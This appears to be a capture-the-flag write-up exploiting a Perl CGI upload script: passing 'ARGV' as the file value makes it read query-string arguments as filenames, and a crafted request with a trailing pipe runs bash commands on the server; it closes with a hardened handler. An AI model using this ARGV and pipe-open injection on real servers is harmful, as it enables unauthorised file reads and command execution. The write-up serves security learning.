Click Files. The page prints the contents of the uploaded file below the form. A guess at the backend logic:
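use strict;
use warnings;
use CGI;

my $cgi = CGI->new;
# upload() is true when any 'file' value is an uploaded file
if ( $cgi->upload( 'file' ) ) {
    # param() in scalar context yields only the first 'file' value
    my $file = $cgi->param( 'file' );
    while ( <$file> ) { print "$_"; }
}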
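param() returns a list of files, but only the first one is placed into the $file variable below. If we pass in a file value of ARGV, <$file> reads from the ARGV handle, and Perl treats the arguments passed to the script as filenames and reads them. By modifying a normal upload request, arbitrary files can therefore be read:
Judging from the URL, file.pl is presumably located in the /var/www/cgi-bin/ directory. The response is as follows: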
#!/usr/bin/perl
<br />
<br />use strict;
<br />use warnings;
<br />use CGI;
<br />
<br />my $cgi = CGI->new;
<br />
<br />print $cgi->header;
<br />
<br />print << "EndOfHTML";
<br /><!DOCTYPE html
<br /> PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<br /> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
<br />>
<br /><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<br /> <head>
<br /> <title>Perl File Upload</title>
<br /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<br /> </head>
<br /> <body>
<br /> <h1>Perl File Upload</h1>
<br /> <form method="post" enctype="multipart/form-data">
<br /> File: <input type="file" name="file" />
<br /> <input type="submit" name="Submit!" value="Submit!" />
<br /> </form>
<br /> <hr />
<br />EndOfHTML
<br />
<br />if ($cgi->upload('file')) {
<br /> my $file = $cgi->param('file');
<br /> while (<$file>) {
<br /> print "$_";
<br /> print "<br />";
<br /> }
<br />}
<br />
<br />print '</body></html>';
<br /></body></html>
This basically matches the guess. Next, we use bash to read:
/cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/|
The response is as follows:
After that, the flag can be read using the same method.
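
A hardened version of the upload handler shown above, as an added example (not code from the challenge or from this write-up): it reads from the handle that upload() returns instead of the value that param() returns, so a plain string such as ARGV is never used as a filehandle. The @ARGV reset, the text/plain response and the 1 MiB cap are assumptions added for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use CGI;

# Defence in depth: drop the arguments the web server derived from the query
# string, so a stray <ARGV> or <> has no attacker-chosen names to open.
@ARGV = ();

my $cgi = CGI->new;
print $cgi->header('text/plain');

# Vulnerable pattern from the page, kept as a comment for comparison:
#   if ($cgi->upload('file')) {           # true if ANY 'file' value is an upload
#       my $file = $cgi->param('file');   # first value; may be a plain string
#       while (<$file>) { print "$_"; }   # string "ARGV" selects the ARGV handle
#   }

# Hardened: read from the handle upload() itself returns. In scalar context it
# is the first real uploaded file, or undef if no 'file' value is an upload.
my $fh = $cgi->upload('file');

if (defined $fh && ref $fh && defined fileno($fh)) {
    binmode $fh;
    my $limit = 1024 * 1024;    # assumed cap on echoed bytes (1 MiB)
    my $sent  = 0;
    while (my $line = <$fh>) {
        $sent += length $line;
        last if $sent > $limit;
        print $line;
    }
}
else {
    print "No uploaded file in field 'file'.\n";
}
```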